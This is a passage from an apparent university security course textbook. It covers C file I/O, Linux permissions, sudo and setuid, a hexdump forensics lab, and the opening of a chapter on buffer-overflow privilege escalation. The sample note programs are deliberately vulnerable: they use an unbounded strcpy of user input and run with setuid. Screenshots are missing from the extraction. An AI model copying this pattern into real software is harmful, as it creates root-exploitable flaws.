x/60xb
$esp
Question 17:
Fill in the values in the table below, showing where the base pointer (label as EBPcheck_password) and stack pointer (label as ESP-check_password) are pointing to. Label these
addresses on your picture.
Question 18:
Locate on the stack the two command line arguments. Show these on the table below, labeling them
as password_buffer and authflag.
STEP 3: Determine the attack technique.
Question 19:
Based on your picture of the stack, design your buffer overflow. Write a clear explanation of how
your attack works in the answer space for Question 19.
Question 20:
Demonstrate your buffer overflow attack during a run of the program. Your instructor or lab tech
will sign off on this.
The program used in this lab was adapted from a program presented in Hacking, the Art of Exploitation, by Jon Erickson, No
Starch Press, 2008.
200
Security Exercise 8 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:
Question 13:
201
Question 14:
Question 15:
Question 16:
Question 17 and Question 18: (Note: Each line in the table below represents four bytes.)
Address
Contents
Question 19:
Question 20: When you have successfully hacked the cadet's program, show your instructor. Your instructor will sign your
answer sheet.
_________________________________
Instructor or Lab Tech signature
202
Chapter 9: Privilege Management
Objectives:
(a) Describe how permissions are managed and controlled in a multi-user OS environment.
(b) Explain how users can be afforded the limited ability to execute commands with escalated privileges.
NEW EMAIL PROCEDURES
GIVING YOU AN EMAIL
ACCOUNT
1. Files in C
1.1. Introduction We can use the C language to open files, read from files, write to files and close files. In C, a file name is
tied to an integer called the file descriptor. Once we tie a file name to a file descriptor, we work only with the file descriptor.
1.2. Opening a File Let’s look at a C program, that I’ve named fun_with_files.c that opens a file named stuff:
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<fcntl.h>
#include<sys/stat.h>
These two lines tell the compiler that your
program intends to use files. If you will be using
files, just (blindly!) include these two lines.
int main( int argc , char *argv[ ] )
{
int fd ;
This line should be the only line that looks
insane to you! Do not fear! This line will
be explained below.
fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
printf("The assigned value of the file descriptor is %d\n",fd);
if ( fd == -1 )
{
printf( "\nFailed to open.\n");
}
}
Notice first that we have a few new #include directives at the top of the program. These are necessary for C to work
with files. Don’t worry about these lines of code (other than ensuring that they are at the top of the program).
The only craziness in the program is the line:
fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
At its heart, this line of code ties the file named stuff to an integer value which is placed in the variable fd. This line of
code essentially asks the C compiler:
“I, the programmer, want to use the file named stuff. I might want to read what is in it. I might want to write to it.
I know that you, the C compiler, do not want to see the file name (in this case, stuff) running around the program,
203
so give me an integer to use as a stand-in for the file named stuff, and place that integer in the variable that I’ve
named fd. Then, later, if I want to do something with the file named stuff, I’ll just refer to the integer fd”
So, let's run the program and see what happens! First, I will look at my home directory:
Now, I will compile and run the program:
We see that C assigned the file named stuff to the file descriptor value of 3 (i.e., fd = 3). If, when dealing with files, C
simply cannot figure out what to do, it will assign the integer -1 to the file descriptor. That is why we placed that final if
statement at the end—in order to check if the compiler encountered some difficulty.
At this point, you might be thinking: "Okay, so what? What did the program do?"
Well, if I now list the files in my home directory once again, I see:
Notice that the file stuff now exists!
1.3. Looking at a File So far, we have looked at files using the nano editor. Oftentimes we want to look at the contents of
a file, with no intention whatsoever to edit the file. In cases where we merely want to view the contents of a file, there is no
need to open an editor. Linux provides us with the cat command. The command
cat filename
will display the contents of the file named filename.
For example, if I enter:
cat
fun_with_files.c
I see:
The contents of the file
named
fun_with_files.c
204
Let's observe the contents of the file named stuff using cat:
and I see … nothing.
At this point, you might be thinking: "Okay, so what? What did the program do?"
1.4. Writing to a File Let's answer the question: What did the program do?" The program did create the file named stuff,
but that is all it did. Specifically, it did not write any contents to the file. The file has been created, but is empty. So, when
we used the cat command to display the contents of the file named stuff, we did indeed see the contents: nothing.
So, let’s modify our program so that we can add content to our file. Before presenting the program, we need to introduce two
additional string functions:


strnlen( buffer )
returns the length of the string named buffer
strncat( buffer , "\n" , 1 ) adds a new-line character to the end of the string buffer.
Practice Problem 9.1
What is the output of the program shown below?
#include<stdio.h>
#include<string.h>
int main( int argc , char *argv[ ] )
{
char my_string[15] = "USNA Rules!" ;
printf( "The string is %s" , my_string ) ;
printf("The string's length is: %d\n" , strnlen( my_string )
);
strncat( my_string , "\n" , 1 ) ;
strncat( my_string , "\n" , 1 ) ;
printf( "The string is %s" , my_string ) ;
printf("The string's length is: %d\n" , strnlen( my_string )
);
}
Solution:
Notice that the strnlen function does not count the terminating NULL as one of the characters in the string. The terminating
NULL (the byte of all zeroes) is certainly there (that is, after all, how the first and third printf statements above knew when
to stop), but the presumption is made that when the programmer wants to know the length of the string, the only concern is
with the number of characters preceding the NULL.
Now, armed with these two new string commands, let’s modify our program fun_with_files.c so that when we execute
the program, we will include a text string as a command line argument. The program will append the text string to the end of
the file stuff using the write command.
The next page displays our modified program, still named fun_with_files.c . Let's suppose I run this program with
the command line argument "To be a midshipman", as shown below:
205
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<fcntl.h>
#include<sys/stat.h>
int main( int argc , char *argv[ ] )
{
int fd ;
char *buffer ;
buffer = (char *)malloc(100);
strcpy( buffer , argv[ 1 ] );
strncat( buffer , "\n" , 1 );
fd = open("stuff", O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
if ( fd == -1 )
{
printf( "\nFailed to open.\n");
exit(0);
}
write( fd , buffer , strnlen( buffer ) );
free( buffer );
}
Line 9 declares the integer variable that will hold the file descriptor. Recall that the file descriptor is just a stand-in for the
name of the file we will be reading from and writing to.
Line 10 declares a string named buffer that, in line 12, is allocated 100 bytes of space on the heap. Line 14 copies argv[1]
into buffer , and line 16 adds a newline character to the end of the string named buffer.
206
At line 17, the picture of our program in main memory looks like this:
Now, line 18 ties the file named stuff to a file descriptor. Lines 20-24 are added to the program so that the user is informed
if the compiler had some trouble opening the file.
The key line of the program that actually adds something to our file named stuff is line 25:
write( fd , buffer , strnlen( buffer ) );
This writes the data pointed to by buffer (which in this case is the string To be a midshipman followed by a new
line) into the file whose file descriptor is fd (which is the file named stuff). The third argument to the function tells how
many bytes to write.
Let’s run the program, showing the contents of the file named stuff.
Let's run this program two more times, examining the file named stuff along the way:
207
If I decide to look at the file named stuff using nano, I see:
Practice Problem 9.2
What would happen if we did not have quotation marks in our command line arguments above?
Solution:
You should appreciate the fact that the file stuff is permanent. If you close VMware and turn off your computer, the file
stuff will be there when you turn your computer back on.
1.5. File Closing. After you have finished writing to a file, the file should be closed. The syntax to close a file is
close( fd );
Again, note that closing a file doesn't delete it! The file is still there, and, if opened by a program later will be in precisely the
same condition it was in before it was closed. So, to make the preceding program perfect, we should close the file by adding
this line to the end of the program.
2. Linux Access Privileges
2.1 File Access for Reading, Writing and Executing. Every file has access privileges that control who can read, write and
execute the file. Every directory has similar privileges, but, for directories, read means “read the contents of the directory,”
write means “add or remove files from the directory” and execute means copy files from the directory.
You can see the access privileges for a file or directory by entering the ls –l command. The –l stands for long; that is,
we want the long listing! A line produced by this command (one line will be produced for each file and directory) might look
like this:
-rwxr-x--x
1
jones
happymids
1024
July 16 17:12
208
happy_times.exe
Here is what the various fields in this line mean:
- rwxr-x--x
1
jones
happymids
The file owner
1024
July 16 17:12
happy_times.exe
The file size
The file name
The file creation date
The file owner also
belongs to this group
This is our main focus for today… these are the access privileges. More on this below!
The dash indicates a file. If this line item was a directory, the first symbol would have been a d.
The important points above: (1) The file is named happy_times.exe and (2) the owner of the file is jones and (3) the
access privileges are rwxr-x--x.
Let’s look more closely at the nine symbols that comprise the access privileges. The symbols used are:




r
w
x
-
for read (which also allows the copying of the file)
for write
for execute
for no access
The first three symbols (i.e., the first triplet) refer to the file owner, the second triplet refers to the owner's group and the third
triplet refers to the general public (everyone who has an account on your system).
So, given the access privileges that we see in the example above:



The owner (jones) can read, write to and execute the file happy_times.exe.
The group (happymids) can read and execute the file happy_times.exe but cannot write to it.
The general public can do nothing other than execute the file happy_times.exe.
The access privileges are called the mode of the file or directory. The owner of a file can change the access privileges for a
file using the change mode (chmod) command. The command’s format is:
209
Practice Problem 9.3
What are the access privileges for happytimes.exe after the command shown above is entered?
Solution:
Practice Problem 9.4
What command would remove the ability for the public to execute happytimes.exe?
Solution:
Practice Problem 9.5
What single command using the assign operator would assign the public the ability to read and execute happytimes.exe?
Solution:
It should be reiterated that only the owner can change a file's mode. Wait… that's not right… who else can change a file's
mode?
Practice Problem 9.6
Who, besides the file's owner, can change a file's mode.
Solution.
Practice Problem 9.7
And just how does one get to be the owner of a file anyway?
Solution:
3. Giving Up a Little Control with sudo and setuid
3.1. User Accounts Let's take our earlier program, fun_with_files.c and—since we are eight pages into this chapter
and no longer having much fun—rename it as: note1.c. Recall that this program takes a text string as a command line
argument, and appends the text string to the end of a file. Let's give the file we read from and write to the more practical name
of notes. This file named notes will reside in the /tmp directory.
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<fcntl.h>
#include<sys/stat.h>
int main( int argc , char *argv[ ] )
{
int fd ;
char *buffer ;
buffer = (char *)malloc(100);
strcpy( buffer , argv[ 1 ] );
strncat( buffer , "\n" , 1 );
fd = open("/tmp/notes", O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
if ( fd == -1 )
{
printf( "\nFailed to open.\n");
}
write( fd , buffer , strnlen( buffer ) );
free( buffer );
close( fd );
}
210
When we compile a program, the executable object code file is named a.out. We can change the name of the object code to
a name of our choosing by using the –o specifier. In the screen capture below, I named the executable code as note1.exe.
Let’s look at the read, write and execute permissions for the source code (note1.c), the object code (note1.exe) and the
text file that this program creates and writes to (/tmp/notes):
It would seem that the executable program that we wrote (note1.exe) can be executed by anyone, but the file /tmp/notes
can only be read and written to by the user named midshipman (since the file is owned by user midshipman).
How many users have accounts on our system? How can we find out? Recall that in Linux, every user is given a directory
under the home directory. So, let's see who has folders under the home directory.
There is one user that is not shown on this list: the user named root. Of all accounts on a Linux system, the account named
root has special privileges and full access rights over the entire system. The root account is owned by the system
administrator, and has the ability to read, write and execute all files in anyone’s account.
Each user who has an account on a Linux system has a unique user ID number, which you can determine by using the id
command. For example, to determine the unique ID number for joe, we enter
If we do this for all users we determine the following IDs:
root
mia
joe
instructor
midshipman
0
500
501
998
999
211
There is a command that allows us to switch users… to switch from midshipman to, say joe. This command is the su
command. Let’s try it!
This command failed! The su command asks for the password of the target account (in this case, joe’s password). The only
time a password will not be asked for is if the su command is entered by the root user! Hopefully you will agree that it
makes sense to restrict this command to run without a password only for the system administrator!
If we wanted to switch to the root user, we would type just su, but, again, this will ask for the root user’s password.
Since executing commands as the root user is potentially very dangerous, Linux provides a more restricted version of the su
command, called sudo. Using sudo allows us to execute a single command as the root user. After using sudo, the very
next command will revert you back to the privileges of your account. 14
Since using sudo gives you root privileges (even for only a single command), a user is prompted for a password every time
they use sudo. This should make sense, since if anyone could use the sudo command, then anyone can act as the root user,
one command at a time.
In a Linux system, the system administrator (root) may give a few trusted assistants sudo privileges.
In order for you to explore privilege management, and get a fuller
understanding of how permissions are managed behind the scenes,
your textbook author (Jon Erickson) has set up your VMware
software so that you, the user midshipman, can use the sudo
command without a password. This will allow you to switch your
identity to that of other users in order to see the system from their
perspective. You must always keep in mind that this is not something
that an ordinary user would ever be able to do.
(http://xkcd.com)
So… let’s use sudo to become the user joe! We enter:
sudo su joe
and see,
I’m joe!15
3.2. The setuid Permission As joe, can I execute the program note1.exe? Looking at the permissions for this file
from Section 3.1 above, the answer would seem to be "yes". Let's try to execute note1.exe:
14
The meaning of the acronym sudo is unclear. In some texts it is presented as "switch user (to root and) do". In some texts it is presented as "super user
do". In some texts it is presented as "substitute user (for root and) do". Of course all texts are in agreement about what the sudo command actually does!
15
Although sudo only provides me the ability to execute one command as root, if the command is to switch to another user, you will remain as that user.
In other words, you do not revert back to the former user after one command.
212
The program did not work. Looking back at the program at the start of Section 3.1, it looks like we invoked the if statement:
if ( fd == -1 )
{
printf( "\nFailed to open.\n");
}
Although joe has permission to execute the program note1.exe, joe is not permitted to write to the file notes.
Suppose we want joe to be able to execute the program note1.exe and actually make changes to the file named
/tmp/notes, but we still do not want him to be able to read or write directly to the file /tmp/notes. In other words, we
do not want joe to be able to write to the file by using, say, nano or some other program, but we do want him to be able to
write to the file provided he only does this by using the note1.exe program. You may be surprised to know that this sort of
scenario occurs quite frequently!
Linux handles this by providing a special permission called the set user ID (setuid) permission. If an executable program
has the setuid flag set, then whenever the program is executed, it will behave as though it were being executed by the
owner.
In other words, if we set the setuid flag for the file note1.exe, then when joe executes the program, the program will
run as if the owner (midshipman) was executing it. This is good because the user named midshipman is the only one
who can write to the file /tmp/notes .
The owner, midshipman, can set the setuid flag for note1.exe . Let's switch back to the user named midshipman by
typing exit, and then:
chmod u+s
note1.exe
Let's do this and look at a listing of the file permissions:
Note the s in the execute field for the owner. That is the indicator that the setuid flag is set.
So… let’s go back to being joe and let’s see if joe can now add notes to /tmp/notes. We enter:
sudo su joe
then
213
Note that joe cannot directly read the file notes (see the permissions for /tmp/notes given in Section 3.1 above). The
only way joe can have an effect on the file tmp/notes is through the use of the program note1.exe.
If we exit, and look at the file as midshipman:
It worked! Now joe—or anyone—can use the program (but only midshipman can read the file /tmp/notes).
Practice Problem 9.8
You are viewing the access privileges of a file exam1.sh and they read: -r-xr-xr-- .
(a)
What privileges for this file are granted to the owner?
(b)
You give the command chmod g-x exam1.sh . What access privilege(s) did you change and to whom
do they apply?
Solution: (a)
(b)
Practice Problem 9.9
The following is the output of ls –l for the shutdown command, which is a system administration program.
We can see that it is owned by the root user (administrator) and appears to be executable by everyone. That is, in actuality, not
the case, since the program named shutdown actually calls other programs, and these other programs can only be executed
by the root user. How can the root user modify the permissions to this program to allow anyone to shut down the computer?
(Give the command, then an explanation of how it solves this problem.)
Solution:
Practice Problem 9.10
What does the sudo command accomplish?
Solution:
Practice Problem 9.11
Who can execute the sudo command?
Solution:
214
Practice Problem 9.12
Consider the long listing for three files, shown below. The file note1.c is a C program that writes to the file /tmp/notes.
The file note1.exe is the compiled version of note1.c.
The system has four users: midshipman, smith, jones and, of course, root.
(a)
The user smith executes the file note1.exe and notices that his attempts to write to the file
/tmp/notes are not successful. Explain why.
Solution:
(b)
Suppose it was necessary to grant users the ability to write to the file /tmp/notes, but only when executing
the program note1.exe. Your friend proposes two ways of accomplishing this:
(i) Enter the command: chmod u+w /tmp/notes
OR
(ii) Enter the command: chmod u+s note1.exe
Which option do you select and why?
Solution:
APPENDIX 16: More about the write command
Let’s go back to that cryptic line of code:
fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
and talk about the second argument to the open function
fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
this second argument reads:
O_RDWR|O_CREAT|O_APPEND
The first item, O_RDWR tells the compiler that the program intends to read and write to the file stuff.
fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
We have two other choices for this first flag:
16

If we only want the program to read a file (but never write to it): O_RDONLY

If we only want a program to write to a file (but never read it): O_WRONLY
Okay, let's end this chapter on an upbeat note: THIS APPENDIX IS NOT TESTABLE!
215
The second flag, O_CREAT , tells the compiler to create the file if it does not already exist.
fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
The third flag, O_APPEND , tells the compiler to write data by appending it to the end of the file.
fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
Our cryptic line of code should now make sense except for that last (third) argument:
fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
Last but not least, let's discuss the third argument:
fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
The third argument is used to set the file permissions. The choices to place in the third argument are:
S_IRUSR
S_IWUSR
S_IXUSR
The owner has permission to read the file
The owner has permission to write to the file
The owner has permission to execute the file
S_IRGRP
S_IWGRP
S_IXGRP
The owner’s group has permission to read the file
The owner’s group has permission to write to the file
The owner’s group has permission to execute the file
S_IROTH
S_IWOTH
S_IXOTH
Anyone has permission to read the file
Anyone has permission to write to the file
Anyone has permission to execute the file
I could put as many of these choices in the third line as I choose, separating my choices with a vertical bar.
What should be the result if I now entered:
ls –l stuff
216
Problems
1.
Navigate to the instructor directory. You should see the prompt:
Using nano, open the file unix_basics for editing:
midshipman@EC310:/home/instructor $ nano unix_basics
Add your favorite Linux command (we realize you have several—just pick one) to the top of the file, and save the file
under the same name (Control-o). Were you successful? Why/Why not?
2.
Given the following declaration
char school[20] = "US Naval Academy";
what value would be returned by each of the following function calls:
3.
(a)
strlen(school);
(b)
strlen("school");
Concerning the C programming language:
(a) What feature of C makes a buffer overflow possible? Be specific!
(b) Who (or what) is responsible for data integrity and memory management in C? (I.e., is it the responsibility of the
compiler?)
4.
Recall Problem 2 at the end of Chapter 6. The problem asked you to enter and compile the program below:
void test_function( int a, int b, int c, int d, int e)
{
int flag;
char buffer[ 10 ];
flag = 1234
buffer[ 0 ]
buffer[ 1 ]
buffer[ 2 ]
;
= 'U' ;
= 'S' ;
= 'A' ;
}
int main( )
{
test_function( 5, 6, 7, 8 , 9 ) ;
}
The Chapter 6 problem then asked you to analyze memory to determine where various arguments and variables were
stored in memory.
In this exercise we will repeat the problem, but by using just the assembly language. Additionally, you do not need
to enter or recompile the program! You should answer all questions by only using the screen captures provided
below.
Consider the screen capture below, which was taken after pausing the program just before the function call (i.e., while
still in main's stack frame):
217
(a)
Sketch a picture of the stack frame for main. In your diagram, show where the base pointer and stack pointer
are pointing to (label these as EBP-main and ESP-main), and show where the arguments to test function
are stored in memory.
I now continue running the program and pause just before the closing brace for the function named test_function (so I
am in test_function's stack frame). Consider the screen shot shown below.
(b)
Based on the screen capture, add to your sketch by showing:



the stack frame for test_function (label these EBP-test_function
test_function).
The location of flag (Hint: the base-10 value of 1234 is equivalent to 0x4d2)
The location of buffer
218
and
ESP
(c)
5.
Show, on your diagram, where the return address and the saved value of the base pointer are stored. From
the assembly code snapshots given, determine the value of the stored return address and the value of the
saved base pointer, and annotate these on your figure.
After typing in the command, ls –l gethappy.exe you see:
(a) Who is the owner of this file?
(b) What permissions do other users in the owner’s group have?
(c) You (midshipman) are neither the owner nor part of the owner’s group instructor. What command would the
administrator enter to give you permission to read and execute the gethappy.exe file?
6.
Continuing Problem 5 above: You (midshipman) now have permission to read and execute the gethappy.exe file.
The function of the gethappy.exe file when executed is to write to the file happytimes.
After multiple attempts, the executable file is not operating as expected. The owner changes the executable file. You
see:
(a) What permission changed? Your answer must include the name of the permission.
(b) How does the change to the file’s permissions affect the execution of the file?
219
220
Security Exercise 9
Do you know who I am!
Bonus points to the
midshipman that can
guess this target!
Part I. Initial Set-up
The program you will use today is named note2.c
and this program has already been placed on your
machine in the EC310code folder under your home
directory. Copy this file to the work directory
by carefully entering the following at the home
directory prompt:
midshipman@EC310:~ $
cp
Make sure you are at your home directory!
ec310code/note2.c
work
Enter this!
Verify that you have note2.c in your work directory by changing to the work directory:
cd work
and then listing the files in the work directory:
ls
If you do not have note2.c in your work directory STOP and ask your instructor or lab tech for help. Otherwise, proceed
to Part 2.
Part II. A Truly Useful Program
Before looking at the code, let's discuss the motivation for this program. Here is the scenario: You are the Company
Commander for your Company. The intent of the program is to allow anyone in your Company (who, of course, all have Linux
accounts) to send you a note. All the notes that are sent to you by company-mates will be written into the file /tmp/notes,
one after another. The idea is that you can read all the notes that midshipmen in your Company send you, but the midshipmen
cannot read the notes sent by anyone else (in fact, they can’t even read their own notes once submitted).
To make this more concrete, you might, at the start of the day, write a note (to yourself) that says
Notes received today:
Then, later in the morning, you might get a note from instructor that says:
Nice job applying your Cyber2 skills in the Hall – keep it up..
Then, in the afternoon, your friend mia might send you a note that says:
The wardroom fridge might be on the fritz again.
In the evening, then, you could check the file named /tmp/notes and see all the notes that were left for you during the day.
For this example, you would enter cat /temp/notes and see:
Notes received today:
Nice job applying your Cyber2 skills in the Hall – keep it up.
The wardroom fridge might be on the fritz again.
But your program is even better than this! Your program includes the user ID of everyone who adds a note! Recall that the
user IDs for the users on your system are:
root
mia
joe
instructo
midshipman
0
500
501
998
999
221
All right! Time to look at the code!
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<fcntl.h>
#include<sys/stat.h>
int main( int argc , char *argv[ ] )
{
int fd ;
int userid;
char *buffer ;
buffer = (char *)malloc(100);
strcpy( buffer , argv[ 1 ] );
strncat( buffer , "\n" , 1 );
fd = open("/tmp/notes", O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
userid = getuid( ) ;
write( fd , &userid , 4 );
write( fd , "\n" , 1 );
write( fd , buffer , strnlen( buffer ) );
free( buffer );
close( fd );
}
In the explanation that follows, let's presume that the executable file is named ./note2.exe (instead of ./a.out) and lets
presume that the user named mia runs the program by entering
./note2.exe
"What is for evening meal?"
Notice that argv[1] is the string:
"What is for evening meal?"
Line 9 declares and integer named fd that will later hold the file descriptor for the file /tmp/notes. Line 11 declares an
integer named userid that will later hold the user ID for the user entering a particular note.
Lines 13 and 15 allocate space for 100 bytes on the heap to hold a string of 100 characters. The name of the string is buffer
(so buffer points to the first character in the string). Line 17 copies argv[1] to buffer, so, in our example, buffer
will now hold the string "What is for evening meal?" (followed by the NULL).
Line 19 appends a newline character to buffer (and this occurs before the NULL), so, after line 19, buffer contains the string
"What is for evening meal?\n" followed by the NULL.
Line 21 assigned a file descriptor to the file named "/tmp/notes" and places the file descriptor in the integer variable
named fd that was declared on line 9. From this point onward, whenever we wish to refer to the file "/tmp/notes" we
will use the file descriptor fd.
Line 23 contains a function we have not seen before: the function getuid( ). This function returns the ID of the user
running the program. Recall that in our example, the user mia is running the program, so getuid( ) will return the value
500, which is mia's ID.
222
So, line 23:
userid = getuid( ) ;
will assign the value 500 to the integer variable userid which was declared on line 11.
Up to this point in the program, information has been placed on the heap (in the string named buffer), but nothing yet has
been written to the file /tmp/notes. Line 25 performs the first operation to write to the file, and notice that what is written
is the user's ID followed by (on line 27) a new line character. Then, on line 29, we write the contents of buffer to the file.
So, at this point, the file /tmp/notes contains:
500
What is for evening meal?
Finally, line 31 frees space on the heap and line 33 closes the file.
Now, suppose an hour later, user instructor (whose ID is 998) runs the program by entering:
./note2.exe
"When is the next parade?"
After instructor is done running the program, the file "/tmp/notes" contains:
500
What is for evening meal?
998
When is the next parade?
So when you, the Company Commander, review the file at the end of the day, you can see all the notes left for you and, just as
important, who it is that left each of the notes.
Part III. Practice Running the Program
Let's compile the program saving the machine language file under the name note2.exe by entering:
gcc
–g
–o
note2.exe
note2.c
Then add the first line to the file /tmp/notes by entering:
./note2.exe
"Notes received today:"
Examine the file /tmp/notes by entering:
cat /tmp/notes
Notice that your ID number is garbled! That is because you are attempting to print out the integer 999 (your ID number) as a
character. We'll address this later.
Now, check permissions for note2.exe and /tmp/notes by entering by entering:
ls
–l
note2.exe
/tmp/notes
You should see:
Question 1: Who owns the file note2.exe ?
Question 2: List all of the users who are able to write to the file named /tmp/notes.
223
You tell all of your company-mates that they have execute permission for the file note2.exe, and that they are to start
sending you messages during the day, and you will review their messages and reply each evening.
The first evening arrives, you look at the file /tmp/notes and you see only your message (Notes received today:).
Your company-mates mia and joe insist that they sent you messages during the day. Hmm…it seems that messages left
by other individuals are not being saved, even though everyone has permission to execute the program note2.exe.
Question 3: Why are other users not experiencing success with this program?
Question 4: What command should you enter to remedy the problem you noted in Question 3? (Do it!)
(Hint: if you answered Question 4 correctly, then, upon entering ls –l note2.exe you should see
Now, let's see how the program would look from mia's perspective.
First, switch to user mia by entering
sudo su mia
Now, the prompt should indicate that you are the user named mia.
Cool - You're mia!!!
Now, noticing that you are mia, run the program by entering:
./note2.exe
"A message from Mia."
Now, as mia, examine the file /tmp/notes by typing:
cat /tmp/notes
Question 5: Was mia successful in looking at the file /tmp/notes? Why/Why not?
Switch back to being the user named midshipman by entering
exit
Now, examine the file /tmp/notes by typing:
cat /tmp/notes
Question 6: Was the message from mia saved in the file?
Question 7: Is the following statement true or false:
Only the user named midshipman can freely read from or write to the file named /tmp/notes. Other
users are permitted to write to the file, but only in a very restricted sense: via the use of the program
note2.exe.
224
Enter the command
ls –l /tmp/notes
Your friend sees the result and says: I see that only the file's owner, midshipman, is able to read or write to the file. But we
just saw that mia was able to write to the file? How is that possible?
Question 8: How would you answer your friend's question?
Part IV. Autopsy of the File Named /tmp/notes
First, let's delete the file current file named /tmp/notes so that we can start fresh.
rm
/tmp/notes
Recall that rm stands for "remove." Verify that the file has been removed by typing:
cat /tmp/notes
You should see the message: No such file or directory
From your work directory, carefully enter the following at the command prompt:
cp
../ec310code/notes
/tmp
Now, recall that you are the user midshipman. Not just any midshipman. The Company Commander! You are very proud
of having reached this position. Your people love you. You check the messages left by your company-mates by typing
cat /tmp/notes
and you see:
ARGGHH! You want to have a talk with the midshipman who sent you the next-to-last note. Was it your friend Mia? Or,
perhaps it was Joe? We need to find out who it is! That midshipman needs to be counseled on respectful communication and
constructive feedback! Haven’t we learned anything in this leadership laboratory?!
In Part III above we mentioned that the ID numbers are garbled. But we can look at the file in hexadecimal.
Enter:
hexdump –C /tmp/notes
225
You should see this:
Examining the hexdump of the file /tmp/notes , our goal is to determine who left the note
You suck – worst CC EVER.
For convenience, the ASCII table is presented below.
Let’s go to the top of the hex dump. We know that the first text we have is: Notes received today:
226
Let’s focus just on the capital N and small o (i.e., the first two letters of Notes received today)
Question 9:
Determine how the text No would be stored in memory in hexadecimal notation.
Locate these values (from Question 9) in the hex code display.
Question 10:
According to the ASCII table, what is the meaning of the byte that immediately precedes No in the
hexdump?
Question 11:
The first four bytes in the hex dump are e7 03 00 00. Since, for every note that is entered, the
user id number of the note writer, a new line, and the actual note are written to the /tmp/notes
file, what is the significance of these first four bytes?
Question 12.
Since the first four bytes are stored in little-endian order, rewrite these four bytes in their actual
order.
Question 13.
Convert your answer to Question 12 to a decimal integer.
Question 14.
What is the significance of this value? (Hint, look at the top of the first page of this Security
Exercise.)
Question 15.
Use all your sleuthing abilities to find the hexadecimal value associated with the unpleasant person
who left the note
You suck – worst CC EVER.
What is the hex value of the user id number of the person who left this note?
Question 16.
Convert your answer for Question 15 to a decimal value.
Question 17.
Who gets fried?
227
228
Security Exercise 9 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:
Question 13:
Question 14:
Question 15:
Question 16:
Question 17:
229
230
Chapter 10: A Real Buffer Overflow
Objectives:
(a) Describe how a buffer overflow attack can be used to gain root access to a computer.
(b) Describe two techniques that a hacker can use to make it simpler to craft a buffer overflow.
(c) Describe technical solutions that have been proposed to prevent a program from being exploited by a buffer overflow.
1. Note-Taking and Note-Searching Programs
1.1. Review of Security Exercise 9 Last time in lab you looked at a fascinating program (named note2.c) that takes a
scintillating text string as a command line argument, and then appends the scintillating text string to the end of the fabulous file
with pathname /tmp/notes. The program also appends—to the very front of a note—the user ID of anyone who adds a note.
You use this program in your capacity as Company Commander: anyone in your Company can send you a note. The idea is
that you can read all the notes that midshipmen in your Company send you, but the midshipmen cannot read the notes sent by
anyone else (and can’t even read their own notes once submitted). By examining the user ID, you can identify all the
“anonymous” (ha, ha) note senders. The program is repeated below.
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<fcntl.h>
#include<sys/stat.h>
int main( int argc , char *argv[ ] )
{
int fd ;
int userid ;
char *buffer ;
buffer = (char *)malloc(100);
strcpy( buffer , argv[ 1 ] );
strncat( buffer , "\n" , 1 );
fd = open( "/tmp/notes", O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
userid = getuid( ) ;
write( fd , &userid , 4 );
write( fd , “\n” , 1 );
write( fd , buffer , strnlen( buffer ) );
free( buffer );
close( fd );
}
Recall that when you first wrote this program, your company mates could not start immediately sending you notes. You first
had to grant setuid permission by entering: chmod u+s note2.exe.
After that, anyone could run the program, and the program would then execute as though executed by the owner. The file
tmp/notes that you looked at in the last lab was built as follows:
First you (midshipman) entered: Notes received today:
Then instructor entered: The wardroom fridge might be on the fritz again.
Then matrix entered: Thanks for the notes.
Then joe entered: You suck – worst CC EVER.
Then matrix entered: Great spirit spot-BZ.
231
And you saw all that you had made, and it was very good. And there was evening, and there was morning—the ninth EC310
chapter.
1.2. A New Program The program note2.c is actually practical and useful. But it would be nice for a user to be able to
explore the file /tmp/notes to see the notes that they had entered. Of course they should not be able to view the notes
that were written by anyone else.
For example, given the notes entered as shown above, if joe were to execute this hypothetical program, he would see:
and if matrix runs the program she would see:
Moreover, it would be nice if the program had one additional feature. It would be nice if the user could run the program with
the option of specifying an additional command line argument. This command line argument would be a string, and the
improved program would only return the user's comments containing that string. The following screen capture should illustrate
how we would like the improved program to run.
Presented below is a program, which we will name bettersearchnote.c , that does precisely this. This program is, quite
obviously, the longest program you have seen (or will see!) in EC310. This program is powerful and complex. Our goal is
that you understand the program in general terms. We present the program all at once below, but in the following pages we
will describe the operation of each of its functions one-by-one. So… hang on!
#include<stdio.h>
#include<string.h>
#include<fcntl.h>
#include<sys/stat.h>
int find_user_note( int fd , int user_uid )
{
int note_uid = -1 ;
unsigned char byte ;
int length;
while( note_uid != user_uid )
{
if( read( fd , &note_uid , 4 ) != 4 )
return -1 ;
if(
